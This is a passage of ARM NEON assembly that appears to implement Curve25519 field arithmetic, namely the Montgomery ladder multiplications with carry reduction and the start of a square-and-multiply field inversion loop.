vadd.i64 q15,q8,q3
vsub.i64 q9,q9,q13
vshr.s64 q13,q14,#26
vsub.i64 q6,q6,q7
vshr.s64 q7,q15,#25
vadd.i64 q10,q10,q13
vshl.i64 q13,q13,#26
vadd.i64 q14,q10,q3
vadd.i64 q1,q1,q7
add r2,r3,#144
vshl.i64 q7,q7,#25
add r4,r3,#96
vadd.i64 q15,q1,q11
add r2,r2,#8
vsub.i64 q2,q2,q13
add r4,r4,#8
vshr.s64 q13,q14,#25
vsub.i64 q7,q8,q7
vshr.s64 q8,q15,#26
vadd.i64 q14,q13,q13
vadd.i64 q12,q12,q8
vtrn.32 d12,d14
vshl.i64 q8,q8,#26
vtrn.32 d13,d15
vadd.i64 q3,q12,q3
vadd.i64 q0,q0,q14
vst1.8 d12,[r2,: 64]!
vshl.i64 q7,q13,#4
vst1.8 d13,[r4,: 64]!
vsub.i64 q1,q1,q8
vshr.s64 q3,q3,#25
vadd.i64 q0,q0,q7
vadd.i64 q5,q5,q3
vshl.i64 q3,q3,#25
vadd.i64 q6,q5,q11
vadd.i64 q0,q0,q13
vshl.i64 q7,q13,#25
vadd.i64 q8,q0,q11
vsub.i64 q3,q12,q3
vshr.s64 q6,q6,#26
vsub.i64 q7,q10,q7
vtrn.32 d2,d6
vshr.s64 q8,q8,#26
vtrn.32 d3,d7
vadd.i64 q3,q9,q6
vst1.8 d2,[r2,: 64]
vshl.i64 q6,q6,#26
vst1.8 d3,[r4,: 64]
vadd.i64 q1,q4,q8
vtrn.32 d4,d14
vshl.i64 q4,q8,#26
vtrn.32 d5,d15
vsub.i64 q5,q5,q6
add r2,r2,#16
vsub.i64 q0,q0,q4
vst1.8 d4,[r2,: 64]
add r4,r4,#16
vst1.8 d5,[r4,: 64]
vtrn.32 d10,d6
vtrn.32 d11,d7
sub r2,r2,#8
sub r4,r4,#8
vtrn.32 d0,d2
vtrn.32 d1,d3
vst1.8 d10,[r2,: 64]
vst1.8 d11,[r4,: 64]
sub r2,r2,#24
sub r4,r4,#24
vst1.8 d0,[r2,: 64]
vst1.8 d1,[r4,: 64]
add r2,r3,#288
add r4,r3,#336
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vsub.i32 q0,q0,q1
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d4-d5},[r4,: 128]!
vsub.i32 q1,q1,q2
add r5,r3,#240
vld1.8 {d4},[r2,: 64]
vld1.8 {d6},[r4,: 64]
vsub.i32 q2,q2,q3
vst1.8 {d0-d1},[r5,: 128]!
vst1.8 {d2-d3},[r5,: 128]!
vst1.8 d4,[r5,: 64]
add r2,r3,#144
add r4,r3,#96
add r5,r3,#144
add r6,r3,#192
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vsub.i32 q2,q0,q1
vadd.i32 q0,q0,q1
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d6-d7},[r4,: 128]!
vsub.i32 q4,q1,q3
vadd.i32 q1,q1,q3
vld1.8 {d6},[r2,: 64]
vld1.8 {d10},[r4,: 64]
vsub.i32 q6,q3,q5
vadd.i32 q3,q3,q5
vst1.8 {d4-d5},[r5,: 128]!
vst1.8 {d0-d1},[r6,: 128]!
vst1.8 {d8-d9},[r5,: 128]!
vst1.8 {d2-d3},[r6,: 128]!
vst1.8 d12,[r5,: 64]
vst1.8 d6,[r6,: 64]
add r2,r3,#0
add r4,r3,#240
vld1.8 {d0-d1},[r4,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vld1.8 {d4},[r4,: 64]
add r4,r3,#336
vld1.8 {d6-d7},[r4,: 128]!
vtrn.32 q0,q3
vld1.8 {d8-d9},[r4,: 128]!
vshl.i32 q5,q0,#4
vtrn.32 q1,q4
vshl.i32 q6,q3,#4
vadd.i32 q5,q5,q0
vadd.i32 q6,q6,q3
vshl.i32 q7,q1,#4
vld1.8 {d5},[r4,: 64]
vshl.i32 q8,q4,#4
vtrn.32 d4,d5
vadd.i32 q7,q7,q1
vadd.i32 q8,q8,q4
vld1.8 {d18-d19},[r2,: 128]!
vshl.i32 q10,q2,#4
vld1.8 {d22-d23},[r2,: 128]!
vadd.i32 q10,q10,q2
vld1.8 {d24},[r2,: 64]
vadd.i32 q5,q5,q0
add r2,r3,#288
vld1.8 {d26-d27},[r2,: 128]!
vadd.i32 q6,q6,q3
vld1.8 {d28-d29},[r2,: 128]!
vadd.i32 q8,q8,q4
vld1.8 {d25},[r2,: 64]
vadd.i32 q10,q10,q2
vtrn.32 q9,q13
vadd.i32 q7,q7,q1
vadd.i32 q5,q5,q0
vtrn.32 q11,q14
vadd.i32 q6,q6,q3
add r2,sp,#560
vadd.i32 q10,q10,q2
vtrn.32 d24,d25
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q6,q13,#1
add r2,sp,#576
vst1.8 {d20-d21},[r2,: 128]
vshl.i32 q10,q14,#1
add r2,sp,#592
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q15,q12,#1
vadd.i32 q8,q8,q4
vext.32 d10,d31,d30,#0
vadd.i32 q7,q7,q1
add r2,sp,#608
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q8,d18,d5
vmlal.s32 q8,d26,d4
vmlal.s32 q8,d19,d9
vmlal.s32 q8,d27,d3
vmlal.s32 q8,d22,d8
vmlal.s32 q8,d28,d2
vmlal.s32 q8,d23,d7
vmlal.s32 q8,d29,d1
vmlal.s32 q8,d24,d6
vmlal.s32 q8,d25,d0
add r2,sp,#624
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q2,d18,d4
vmlal.s32 q2,d12,d9
vmlal.s32 q2,d13,d8
vmlal.s32 q2,d19,d3
vmlal.s32 q2,d22,d2
vmlal.s32 q2,d23,d1
vmlal.s32 q2,d24,d0
add r2,sp,#640
vst1.8 {d20-d21},[r2,: 128]
vmull.s32 q7,d18,d9
vmlal.s32 q7,d26,d3
vmlal.s32 q7,d19,d8
vmlal.s32 q7,d27,d2
vmlal.s32 q7,d22,d7
vmlal.s32 q7,d28,d1
vmlal.s32 q7,d23,d6
vmlal.s32 q7,d29,d0
add r2,sp,#656
vst1.8 {d10-d11},[r2,: 128]
vmull.s32 q5,d18,d3
vmlal.s32 q5,d19,d2
vmlal.s32 q5,d22,d1
vmlal.s32 q5,d23,d0
vmlal.s32 q5,d12,d8
add r2,sp,#672
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q4,d18,d8
vmlal.s32 q4,d26,d2
vmlal.s32 q4,d19,d7
vmlal.s32 q4,d27,d1
vmlal.s32 q4,d22,d6
vmlal.s32 q4,d28,d0
vmull.s32 q8,d18,d7
vmlal.s32 q8,d26,d1
vmlal.s32 q8,d19,d6
vmlal.s32 q8,d27,d0
add r2,sp,#576
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q7,d24,d21
vmlal.s32 q7,d25,d20
vmlal.s32 q4,d23,d21
vmlal.s32 q4,d29,d20
vmlal.s32 q8,d22,d21
vmlal.s32 q8,d28,d20
vmlal.s32 q5,d24,d20
add r2,sp,#576
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q7,d18,d6
vmlal.s32 q7,d26,d0
add r2,sp,#656
vld1.8 {d30-d31},[r2,: 128]
vmlal.s32 q2,d30,d21
vmlal.s32 q7,d19,d21
vmlal.s32 q7,d27,d20
add r2,sp,#624
vld1.8 {d26-d27},[r2,: 128]
vmlal.s32 q4,d25,d27
vmlal.s32 q8,d29,d27
vmlal.s32 q8,d25,d26
vmlal.s32 q7,d28,d27
vmlal.s32 q7,d29,d26
add r2,sp,#608
vld1.8 {d28-d29},[r2,: 128]
vmlal.s32 q4,d24,d29
vmlal.s32 q8,d23,d29
vmlal.s32 q8,d24,d28
vmlal.s32 q7,d22,d29
vmlal.s32 q7,d23,d28
add r2,sp,#608
vst1.8 {d8-d9},[r2,: 128]
add r2,sp,#560
vld1.8 {d8-d9},[r2,: 128]
vmlal.s32 q7,d24,d9
vmlal.s32 q7,d25,d31
vmull.s32 q1,d18,d2
vmlal.s32 q1,d19,d1
vmlal.s32 q1,d22,d0
vmlal.s32 q1,d24,d27
vmlal.s32 q1,d23,d20
vmlal.s32 q1,d12,d7
vmlal.s32 q1,d13,d6
vmull.s32 q6,d18,d1
vmlal.s32 q6,d19,d0
vmlal.s32 q6,d23,d27
vmlal.s32 q6,d22,d20
vmlal.s32 q6,d24,d26
vmull.s32 q0,d18,d0
vmlal.s32 q0,d22,d27
vmlal.s32 q0,d23,d26
vmlal.s32 q0,d24,d31
vmlal.s32 q0,d19,d20
add r2,sp,#640
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q2,d18,d7
vmlal.s32 q2,d19,d6
vmlal.s32 q5,d18,d6
vmlal.s32 q5,d19,d21
vmlal.s32 q1,d18,d21
vmlal.s32 q1,d19,d29
vmlal.s32 q0,d18,d28
vmlal.s32 q0,d19,d9
vmlal.s32 q6,d18,d29
vmlal.s32 q6,d19,d28
add r2,sp,#592
vld1.8 {d18-d19},[r2,: 128]
add r2,sp,#512
vld1.8 {d22-d23},[r2,: 128]
vmlal.s32 q5,d19,d7
vmlal.s32 q0,d18,d21
vmlal.s32 q0,d19,d29
vmlal.s32 q6,d18,d6
add r2,sp,#528
vld1.8 {d6-d7},[r2,: 128]
vmlal.s32 q6,d19,d21
add r2,sp,#576
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q0,d30,d8
add r2,sp,#672
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q5,d30,d29
add r2,sp,#608
vld1.8 {d24-d25},[r2,: 128]
vmlal.s32 q1,d30,d28
vadd.i64 q13,q0,q11
vadd.i64 q14,q5,q11
vmlal.s32 q6,d30,d9
vshr.s64 q4,q13,#26
vshr.s64 q13,q14,#26
vadd.i64 q7,q7,q4
vshl.i64 q4,q4,#26
vadd.i64 q14,q7,q3
vadd.i64 q9,q9,q13
vshl.i64 q13,q13,#26
vadd.i64 q15,q9,q3
vsub.i64 q0,q0,q4
vshr.s64 q4,q14,#25
vsub.i64 q5,q5,q13
vshr.s64 q13,q15,#25
vadd.i64 q6,q6,q4
vshl.i64 q4,q4,#25
vadd.i64 q14,q6,q11
vadd.i64 q2,q2,q13
vsub.i64 q4,q7,q4
vshr.s64 q7,q14,#26
vshl.i64 q13,q13,#25
vadd.i64 q14,q2,q11
vadd.i64 q8,q8,q7
vshl.i64 q7,q7,#26
vadd.i64 q15,q8,q3
vsub.i64 q9,q9,q13
vshr.s64 q13,q14,#26
vsub.i64 q6,q6,q7
vshr.s64 q7,q15,#25
vadd.i64 q10,q10,q13
vshl.i64 q13,q13,#26
vadd.i64 q14,q10,q3
vadd.i64 q1,q1,q7
add r2,r3,#288
vshl.i64 q7,q7,#25
add r4,r3,#96
vadd.i64 q15,q1,q11
add r2,r2,#8
vsub.i64 q2,q2,q13
add r4,r4,#8
vshr.s64 q13,q14,#25
vsub.i64 q7,q8,q7
vshr.s64 q8,q15,#26
vadd.i64 q14,q13,q13
vadd.i64 q12,q12,q8
vtrn.32 d12,d14
vshl.i64 q8,q8,#26
vtrn.32 d13,d15
vadd.i64 q3,q12,q3
vadd.i64 q0,q0,q14
vst1.8 d12,[r2,: 64]!
vshl.i64 q7,q13,#4
vst1.8 d13,[r4,: 64]!
vsub.i64 q1,q1,q8
vshr.s64 q3,q3,#25
vadd.i64 q0,q0,q7
vadd.i64 q5,q5,q3
vshl.i64 q3,q3,#25
vadd.i64 q6,q5,q11
vadd.i64 q0,q0,q13
vshl.i64 q7,q13,#25
vadd.i64 q8,q0,q11
vsub.i64 q3,q12,q3
vshr.s64 q6,q6,#26
vsub.i64 q7,q10,q7
vtrn.32 d2,d6
vshr.s64 q8,q8,#26
vtrn.32 d3,d7
vadd.i64 q3,q9,q6
vst1.8 d2,[r2,: 64]
vshl.i64 q6,q6,#26
vst1.8 d3,[r4,: 64]
vadd.i64 q1,q4,q8
vtrn.32 d4,d14
vshl.i64 q4,q8,#26
vtrn.32 d5,d15
vsub.i64 q5,q5,q6
add r2,r2,#16
vsub.i64 q0,q0,q4
vst1.8 d4,[r2,: 64]
add r4,r4,#16
vst1.8 d5,[r4,: 64]
vtrn.32 d10,d6
vtrn.32 d11,d7
sub r2,r2,#8
sub r4,r4,#8
vtrn.32 d0,d2
vtrn.32 d1,d3
vst1.8 d10,[r2,: 64]
vst1.8 d11,[r4,: 64]
sub r2,r2,#24
sub r4,r4,#24
vst1.8 d0,[r2,: 64]
vst1.8 d1,[r4,: 64]
add r2,sp,#544
add r4,r3,#144
add r5,r3,#192
vld1.8 {d0-d1},[r2,: 128]
vld1.8 {d2-d3},[r4,: 128]!
vld1.8 {d4-d5},[r5,: 128]!
vzip.i32 q1,q2
vld1.8 {d6-d7},[r4,: 128]!
vld1.8 {d8-d9},[r5,: 128]!
vshl.i32 q5,q1,#1
vzip.i32 q3,q4
vshl.i32 q6,q2,#1
vld1.8 {d14},[r4,: 64]
vshl.i32 q8,q3,#1
vld1.8 {d15},[r5,: 64]
vshl.i32 q9,q4,#1
vmul.i32 d21,d7,d1
vtrn.32 d14,d15
vmul.i32 q11,q4,q0
vmul.i32 q0,q7,q0
vmull.s32 q12,d2,d2
vmlal.s32 q12,d11,d1
vmlal.s32 q12,d12,d0
vmlal.s32 q12,d13,d23
vmlal.s32 q12,d16,d22
vmlal.s32 q12,d7,d21
vmull.s32 q10,d2,d11
vmlal.s32 q10,d4,d1
vmlal.s32 q10,d13,d0
vmlal.s32 q10,d6,d23
vmlal.s32 q10,d17,d22
vmull.s32 q13,d10,d4
vmlal.s32 q13,d11,d3
vmlal.s32 q13,d13,d1
vmlal.s32 q13,d16,d0
vmlal.s32 q13,d17,d23
vmlal.s32 q13,d8,d22
vmull.s32 q1,d10,d5
vmlal.s32 q1,d11,d4
vmlal.s32 q1,d6,d1
vmlal.s32 q1,d17,d0
vmlal.s32 q1,d8,d23
vmull.s32 q14,d10,d6
vmlal.s32 q14,d11,d13
vmlal.s32 q14,d4,d4
vmlal.s32 q14,d17,d1
vmlal.s32 q14,d18,d0
vmlal.s32 q14,d9,d23
vmull.s32 q11,d10,d7
vmlal.s32 q11,d11,d6
vmlal.s32 q11,d12,d5
vmlal.s32 q11,d8,d1
vmlal.s32 q11,d19,d0
vmull.s32 q15,d10,d8
vmlal.s32 q15,d11,d17
vmlal.s32 q15,d12,d6
vmlal.s32 q15,d13,d5
vmlal.s32 q15,d19,d1
vmlal.s32 q15,d14,d0
vmull.s32 q2,d10,d9
vmlal.s32 q2,d11,d8
vmlal.s32 q2,d12,d7
vmlal.s32 q2,d13,d6
vmlal.s32 q2,d14,d1
vmull.s32 q0,d15,d1
vmlal.s32 q0,d10,d14
vmlal.s32 q0,d11,d19
vmlal.s32 q0,d12,d8
vmlal.s32 q0,d13,d17
vmlal.s32 q0,d6,d6
add r2,sp,#512
vld1.8 {d18-d19},[r2,: 128]
vmull.s32 q3,d16,d7
vmlal.s32 q3,d10,d15
vmlal.s32 q3,d11,d14
vmlal.s32 q3,d12,d9
vmlal.s32 q3,d13,d8
add r2,sp,#528
vld1.8 {d8-d9},[r2,: 128]
vadd.i64 q5,q12,q9
vadd.i64 q6,q15,q9
vshr.s64 q5,q5,#26
vshr.s64 q6,q6,#26
vadd.i64 q7,q10,q5
vshl.i64 q5,q5,#26
vadd.i64 q8,q7,q4
vadd.i64 q2,q2,q6
vshl.i64 q6,q6,#26
vadd.i64 q10,q2,q4
vsub.i64 q5,q12,q5
vshr.s64 q8,q8,#25
vsub.i64 q6,q15,q6
vshr.s64 q10,q10,#25
vadd.i64 q12,q13,q8
vshl.i64 q8,q8,#25
vadd.i64 q13,q12,q9
vadd.i64 q0,q0,q10
vsub.i64 q7,q7,q8
vshr.s64 q8,q13,#26
vshl.i64 q10,q10,#25
vadd.i64 q13,q0,q9
vadd.i64 q1,q1,q8
vshl.i64 q8,q8,#26
vadd.i64 q15,q1,q4
vsub.i64 q2,q2,q10
vshr.s64 q10,q13,#26
vsub.i64 q8,q12,q8
vshr.s64 q12,q15,#25
vadd.i64 q3,q3,q10
vshl.i64 q10,q10,#26
vadd.i64 q13,q3,q4
vadd.i64 q14,q14,q12
add r2,r3,#144
vshl.i64 q12,q12,#25
add r4,r3,#192
vadd.i64 q15,q14,q9
add r2,r2,#8
vsub.i64 q0,q0,q10
add r4,r4,#8
vshr.s64 q10,q13,#25
vsub.i64 q1,q1,q12
vshr.s64 q12,q15,#26
vadd.i64 q13,q10,q10
vadd.i64 q11,q11,q12
vtrn.32 d16,d2
vshl.i64 q12,q12,#26
vtrn.32 d17,d3
vadd.i64 q1,q11,q4
vadd.i64 q4,q5,q13
vst1.8 d16,[r2,: 64]!
vshl.i64 q5,q10,#4
vst1.8 d17,[r4,: 64]!
vsub.i64 q8,q14,q12
vshr.s64 q1,q1,#25
vadd.i64 q4,q4,q5
vadd.i64 q5,q6,q1
vshl.i64 q1,q1,#25
vadd.i64 q6,q5,q9
vadd.i64 q4,q4,q10
vshl.i64 q10,q10,#25
vadd.i64 q9,q4,q9
vsub.i64 q1,q11,q1
vshr.s64 q6,q6,#26
vsub.i64 q3,q3,q10
vtrn.32 d16,d2
vshr.s64 q9,q9,#26
vtrn.32 d17,d3
vadd.i64 q1,q2,q6
vst1.8 d16,[r2,: 64]
vshl.i64 q2,q6,#26
vst1.8 d17,[r4,: 64]
vadd.i64 q6,q7,q9
vtrn.32 d0,d6
vshl.i64 q7,q9,#26
vtrn.32 d1,d7
vsub.i64 q2,q5,q2
add r2,r2,#16
vsub.i64 q3,q4,q7
vst1.8 d0,[r2,: 64]
add r4,r4,#16
vst1.8 d1,[r4,: 64]
vtrn.32 d4,d2
vtrn.32 d5,d3
sub r2,r2,#8
sub r4,r4,#8
vtrn.32 d6,d12
vtrn.32 d7,d13
vst1.8 d4,[r2,: 64]
vst1.8 d5,[r4,: 64]
sub r2,r2,#24
sub r4,r4,#24
vst1.8 d6,[r2,: 64]
vst1.8 d7,[r4,: 64]
add r2,r3,#336
add r4,r3,#288
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vadd.i32 q0,q0,q1
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d4-d5},[r4,: 128]!
vadd.i32 q1,q1,q2
add r5,r3,#288
vld1.8 {d4},[r2,: 64]
vld1.8 {d6},[r4,: 64]
vadd.i32 q2,q2,q3
vst1.8 {d0-d1},[r5,: 128]!
vst1.8 {d2-d3},[r5,: 128]!
vst1.8 d4,[r5,: 64]
add r2,r3,#48
add r4,r3,#144
vld1.8 {d0-d1},[r4,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vld1.8 {d4},[r4,: 64]
add r4,r3,#288
vld1.8 {d6-d7},[r4,: 128]!
vtrn.32 q0,q3
vld1.8 {d8-d9},[r4,: 128]!
vshl.i32 q5,q0,#4
vtrn.32 q1,q4
vshl.i32 q6,q3,#4
vadd.i32 q5,q5,q0
vadd.i32 q6,q6,q3
vshl.i32 q7,q1,#4
vld1.8 {d5},[r4,: 64]
vshl.i32 q8,q4,#4
vtrn.32 d4,d5
vadd.i32 q7,q7,q1
vadd.i32 q8,q8,q4
vld1.8 {d18-d19},[r2,: 128]!
vshl.i32 q10,q2,#4
vld1.8 {d22-d23},[r2,: 128]!
vadd.i32 q10,q10,q2
vld1.8 {d24},[r2,: 64]
vadd.i32 q5,q5,q0
add r2,r3,#240
vld1.8 {d26-d27},[r2,: 128]!
vadd.i32 q6,q6,q3
vld1.8 {d28-d29},[r2,: 128]!
vadd.i32 q8,q8,q4
vld1.8 {d25},[r2,: 64]
vadd.i32 q10,q10,q2
vtrn.32 q9,q13
vadd.i32 q7,q7,q1
vadd.i32 q5,q5,q0
vtrn.32 q11,q14
vadd.i32 q6,q6,q3
add r2,sp,#560
vadd.i32 q10,q10,q2
vtrn.32 d24,d25
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q6,q13,#1
add r2,sp,#576
vst1.8 {d20-d21},[r2,: 128]
vshl.i32 q10,q14,#1
add r2,sp,#592
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q15,q12,#1
vadd.i32 q8,q8,q4
vext.32 d10,d31,d30,#0
vadd.i32 q7,q7,q1
add r2,sp,#608
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q8,d18,d5
vmlal.s32 q8,d26,d4
vmlal.s32 q8,d19,d9
vmlal.s32 q8,d27,d3
vmlal.s32 q8,d22,d8
vmlal.s32 q8,d28,d2
vmlal.s32 q8,d23,d7
vmlal.s32 q8,d29,d1
vmlal.s32 q8,d24,d6
vmlal.s32 q8,d25,d0
add r2,sp,#624
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q2,d18,d4
vmlal.s32 q2,d12,d9
vmlal.s32 q2,d13,d8
vmlal.s32 q2,d19,d3
vmlal.s32 q2,d22,d2
vmlal.s32 q2,d23,d1
vmlal.s32 q2,d24,d0
add r2,sp,#640
vst1.8 {d20-d21},[r2,: 128]
vmull.s32 q7,d18,d9
vmlal.s32 q7,d26,d3
vmlal.s32 q7,d19,d8
vmlal.s32 q7,d27,d2
vmlal.s32 q7,d22,d7
vmlal.s32 q7,d28,d1
vmlal.s32 q7,d23,d6
vmlal.s32 q7,d29,d0
add r2,sp,#656
vst1.8 {d10-d11},[r2,: 128]
vmull.s32 q5,d18,d3
vmlal.s32 q5,d19,d2
vmlal.s32 q5,d22,d1
vmlal.s32 q5,d23,d0
vmlal.s32 q5,d12,d8
add r2,sp,#672
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q4,d18,d8
vmlal.s32 q4,d26,d2
vmlal.s32 q4,d19,d7
vmlal.s32 q4,d27,d1
vmlal.s32 q4,d22,d6
vmlal.s32 q4,d28,d0
vmull.s32 q8,d18,d7
vmlal.s32 q8,d26,d1
vmlal.s32 q8,d19,d6
vmlal.s32 q8,d27,d0
add r2,sp,#576
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q7,d24,d21
vmlal.s32 q7,d25,d20
vmlal.s32 q4,d23,d21
vmlal.s32 q4,d29,d20
vmlal.s32 q8,d22,d21
vmlal.s32 q8,d28,d20
vmlal.s32 q5,d24,d20
add r2,sp,#576
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q7,d18,d6
vmlal.s32 q7,d26,d0
add r2,sp,#656
vld1.8 {d30-d31},[r2,: 128]
vmlal.s32 q2,d30,d21
vmlal.s32 q7,d19,d21
vmlal.s32 q7,d27,d20
add r2,sp,#624
vld1.8 {d26-d27},[r2,: 128]
vmlal.s32 q4,d25,d27
vmlal.s32 q8,d29,d27
vmlal.s32 q8,d25,d26
vmlal.s32 q7,d28,d27
vmlal.s32 q7,d29,d26
add r2,sp,#608
vld1.8 {d28-d29},[r2,: 128]
vmlal.s32 q4,d24,d29
vmlal.s32 q8,d23,d29
vmlal.s32 q8,d24,d28
vmlal.s32 q7,d22,d29
vmlal.s32 q7,d23,d28
add r2,sp,#608
vst1.8 {d8-d9},[r2,: 128]
add r2,sp,#560
vld1.8 {d8-d9},[r2,: 128]
vmlal.s32 q7,d24,d9
vmlal.s32 q7,d25,d31
vmull.s32 q1,d18,d2
vmlal.s32 q1,d19,d1
vmlal.s32 q1,d22,d0
vmlal.s32 q1,d24,d27
vmlal.s32 q1,d23,d20
vmlal.s32 q1,d12,d7
vmlal.s32 q1,d13,d6
vmull.s32 q6,d18,d1
vmlal.s32 q6,d19,d0
vmlal.s32 q6,d23,d27
vmlal.s32 q6,d22,d20
vmlal.s32 q6,d24,d26
vmull.s32 q0,d18,d0
vmlal.s32 q0,d22,d27
vmlal.s32 q0,d23,d26
vmlal.s32 q0,d24,d31
vmlal.s32 q0,d19,d20
add r2,sp,#640
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q2,d18,d7
vmlal.s32 q2,d19,d6
vmlal.s32 q5,d18,d6
vmlal.s32 q5,d19,d21
vmlal.s32 q1,d18,d21
vmlal.s32 q1,d19,d29
vmlal.s32 q0,d18,d28
vmlal.s32 q0,d19,d9
vmlal.s32 q6,d18,d29
vmlal.s32 q6,d19,d28
add r2,sp,#592
vld1.8 {d18-d19},[r2,: 128]
add r2,sp,#512
vld1.8 {d22-d23},[r2,: 128]
vmlal.s32 q5,d19,d7
vmlal.s32 q0,d18,d21
vmlal.s32 q0,d19,d29
vmlal.s32 q6,d18,d6
add r2,sp,#528
vld1.8 {d6-d7},[r2,: 128]
vmlal.s32 q6,d19,d21
add r2,sp,#576
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q0,d30,d8
add r2,sp,#672
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q5,d30,d29
add r2,sp,#608
vld1.8 {d24-d25},[r2,: 128]
vmlal.s32 q1,d30,d28
vadd.i64 q13,q0,q11
vadd.i64 q14,q5,q11
vmlal.s32 q6,d30,d9
vshr.s64 q4,q13,#26
vshr.s64 q13,q14,#26
vadd.i64 q7,q7,q4
vshl.i64 q4,q4,#26
vadd.i64 q14,q7,q3
vadd.i64 q9,q9,q13
vshl.i64 q13,q13,#26
vadd.i64 q15,q9,q3
vsub.i64 q0,q0,q4
vshr.s64 q4,q14,#25
vsub.i64 q5,q5,q13
vshr.s64 q13,q15,#25
vadd.i64 q6,q6,q4
vshl.i64 q4,q4,#25
vadd.i64 q14,q6,q11
vadd.i64 q2,q2,q13
vsub.i64 q4,q7,q4
vshr.s64 q7,q14,#26
vshl.i64 q13,q13,#25
vadd.i64 q14,q2,q11
vadd.i64 q8,q8,q7
vshl.i64 q7,q7,#26
vadd.i64 q15,q8,q3
vsub.i64 q9,q9,q13
vshr.s64 q13,q14,#26
vsub.i64 q6,q6,q7
vshr.s64 q7,q15,#25
vadd.i64 q10,q10,q13
vshl.i64 q13,q13,#26
vadd.i64 q14,q10,q3
vadd.i64 q1,q1,q7
add r2,r3,#240
vshl.i64 q7,q7,#25
add r4,r3,#144
vadd.i64 q15,q1,q11
add r2,r2,#8
vsub.i64 q2,q2,q13
add r4,r4,#8
vshr.s64 q13,q14,#25
vsub.i64 q7,q8,q7
vshr.s64 q8,q15,#26
vadd.i64 q14,q13,q13
vadd.i64 q12,q12,q8
vtrn.32 d12,d14
vshl.i64 q8,q8,#26
vtrn.32 d13,d15
vadd.i64 q3,q12,q3
vadd.i64 q0,q0,q14
vst1.8 d12,[r2,: 64]!
vshl.i64 q7,q13,#4
vst1.8 d13,[r4,: 64]!
vsub.i64 q1,q1,q8
vshr.s64 q3,q3,#25
vadd.i64 q0,q0,q7
vadd.i64 q5,q5,q3
vshl.i64 q3,q3,#25
vadd.i64 q6,q5,q11
vadd.i64 q0,q0,q13
vshl.i64 q7,q13,#25
vadd.i64 q8,q0,q11
vsub.i64 q3,q12,q3
vshr.s64 q6,q6,#26
vsub.i64 q7,q10,q7
vtrn.32 d2,d6
vshr.s64 q8,q8,#26
vtrn.32 d3,d7
vadd.i64 q3,q9,q6
vst1.8 d2,[r2,: 64]
vshl.i64 q6,q6,#26
vst1.8 d3,[r4,: 64]
vadd.i64 q1,q4,q8
vtrn.32 d4,d14
vshl.i64 q4,q8,#26
vtrn.32 d5,d15
vsub.i64 q5,q5,q6
add r2,r2,#16
vsub.i64 q0,q0,q4
vst1.8 d4,[r2,: 64]
add r4,r4,#16
vst1.8 d5,[r4,: 64]
vtrn.32 d10,d6
vtrn.32 d11,d7
sub r2,r2,#8
sub r4,r4,#8
vtrn.32 d0,d2
vtrn.32 d1,d3
vst1.8 d10,[r2,: 64]
vst1.8 d11,[r4,: 64]
sub r2,r2,#24
sub r4,r4,#24
vst1.8 d0,[r2,: 64]
vst1.8 d1,[r4,: 64]
ldr r2,[sp,#488]
ldr r4,[sp,#492]
subs r5,r2,#1
bge ._mainloop
add r1,r3,#144
add r2,r3,#336
vld1.8 {d0-d1},[r1,: 128]!
vld1.8 {d2-d3},[r1,: 128]!
vld1.8 {d4},[r1,: 64]
vst1.8 {d0-d1},[r2,: 128]!
vst1.8 {d2-d3},[r2,: 128]!
vst1.8 d4,[r2,: 64]
ldr r1,=0
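/* Note: the loop below appears to compute the field inversion
 * z^(p-2) mod p, with p = 2^255-19, as a fixed square-and-multiply
 * addition chain: r1 counts the twelve stages and r5 is loaded with
 * the number of squarings performed in each stage. */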
._invertloop:
add r2,r3,#144
ldr r4,=0
ldr r5,=2
cmp r1,#1
ldreq r5,=1
addeq r2,r3,#336
addeq r4,r3,#48
cmp r1,#2
ldreq r5,=1
addeq r2,r3,#48
cmp r1,#3
ldreq r5,=5
addeq r4,r3,#336
cmp r1,#4
ldreq r5,=10
cmp r1,#5
ldreq r5,=20
cmp r1,#6
ldreq r5,=10
addeq r2,r3,#336
addeq r4,r3,#336
cmp r1,#7
ldreq r5,=50
cmp r1,#8
ldreq r5,=100
cmp r1,#9
ldreq r5,=50
addeq r2,r3,#336
cmp r1,#10
ldreq r5,=5
addeq r2,r3,#48
cmp r1,#11
ldreq r5,=0
addeq r2,r3,#96
add r6,r3,#144
add r7,r3,#288
vld1.8 {d0-d1},[r6,: 128]!
vld1.8 {d2-d3},[r6,: 128]!
vld1.8 {d4},[r6,: 64]
vst1.8 {d0-d1},[r7,: 128]!
vst1.8 {d2-d3},[r7,: 128]!
vst1.8 d4,[r7,: 64]
cmp r5,#0
beq ._skipsquaringloop
._squaringloop:
add r6,r3,#288
add r7,r3,#288
add r8,r3,#288
vmov.i32 q0,#19
vmov.i32 q1,#0
vmov.i32 q2,#1
vzip.i32 q1,q2
vld1.8 {d4-d5},[r7,: 128]!
vld1.8 {d6-d7},[r7,: 128]!
vld1.8 {d9},[r7,: 64]
vld1.8 {d10-d11},[r6,: 128]!
add r7,sp,#416
vld1.8 {d12-d13},[r6,: 128]!
